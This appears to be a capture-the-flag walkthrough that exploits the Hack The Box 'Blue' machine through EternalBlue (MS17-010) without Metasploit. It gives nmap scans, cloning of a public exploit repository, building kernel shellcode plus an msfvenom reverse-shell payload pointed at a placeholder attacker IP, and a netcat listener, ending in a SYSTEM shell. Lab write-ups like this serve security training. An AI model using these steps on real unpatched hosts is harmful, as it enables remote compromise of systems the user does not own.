Hack The Box - Blue Walkthrough without Metasploit

Blue

Enumeration

To enumerate the box we will use the following nmap command:

nmap -sC -sV -A 10.10.10.40

Blue Enumeration

As we can see we have the port 445 (SMB) open, it even disclose some important information Windows 7 professional 7601 Service Pack 1, lets run a new enumeration, this time with vulnerability scripts:

We will be using two flags:

--script: This flag will be used to apply "vuln" (vulnerability) scripts on the given ports of the box.

-p: will scan only the ports listed, in our case 445 since its the only one we are currently interested on.

nmap --script vuln -p445 10.10.10.40

EternalBlue Vulnerability

Something really interesting catch our eye, CVE-2017-0143 (MS17-010), with a quick google search...

Finding the Vulnerability

CVE-2017-0143 : The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows

Eternal Blue exploit, with lots of Metasploit modules.. but we will not fall into the temptation of using MSF (which is a really usefull tool but not our goal here).

Non Metasploit exploit

If we search "a bit more" we will find this excellent github repository:

GitHub - 3ndG4me/AutoBlue-MS17-010: This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010GitHub

Let's clone this repository:

git clone https://github.com/3ndG4me/AutoBlue-MS17-010

There are several scripts in the folder, the first one we will use is eternal_checker.py to confirm it is vulnerable:

python eternal_checker.py 10.10.10.40 -port 445

Eternal Checker

Exploitation

Generate a Payload

Now we navigate to shellcode folder in order to generate our payload, this will be done in two steps:

nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin

Generating Kernel.bin

And now our msfvenom payload:

msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f raw -o evilReverse.bin

msfvenom payload

Now we have to mix them together:

cat evilKernel.bin evilReverse.bin > evilPayload.bin

Mixing both parts

Executing the Exploit

First of all we need a netcat listener:

nc -nvlp 443

Now we need to decide which python script to use, with our previous enumeration we have discovered that the target OS is Windows 7

Eternalblue_exploit7.py

Now in order to use the exploit we need some parameters, the victim ip, the mixed payload, and the numGroomConn:

Failing attempt

This attempt failed, now we have to change the number of groom connection until we find a valid one, we can go increasing the value until that.

Pwnd

After some tries increasing the number of groom connections we were able to get a shell as NT Authority

After some tries